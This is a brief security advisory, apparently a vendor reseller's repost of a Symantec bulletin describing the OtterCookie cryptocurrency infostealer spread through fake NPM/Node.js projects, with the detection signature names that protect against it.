Ottercookie observed being used by nation states to steal crypto currency

Week 02, 2025

OtterCookie, an infostealer designed to steal crypto currency information, has recently been observed in use by nation state actors. The attack begins after users are tricked into downloading the loader disguised as NPM or Node.JS projects. Once executed the loader downloads JSON data from a remote location and proceeds to execute the cookie property as JavaScript code. Once infected Ottercookie is able to received remote commands and execute shell commands and scan the infected machine for documents or images containing cryptocurrency wallets.

Symantec protects you from this threat, identified by the following:

Adaptive-based

ACM.Ps-Wscr!g1

Carbon Black-based

Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malwares from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit from VMware Carbon Black Cloud reputation service.

File-based

JS.Cryxos!gen1
Trojan.Gen.MBT

Web-based

Observed domains/IPs are covered under security categories in all WebPulse enabled products

As Technovera Co., we officially partner with well-known vendors in the IT industry to provide solutions tailored to our customers’ needs. Technovera makes the purchase and guarantee of all these vendors, as well as the installation and configuration of the specified hardware and software.

We believe in providing technical IT solutions based on experience.

News Source

What did IPS do for you last week?

9 More Predictions for 2025

Ottercookie observed being used by nation states to steal crypto currency

Week 02, 2025

h3 {font-size:18px;font-weight:800;color:#128BCE<span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start">﻿</span>;}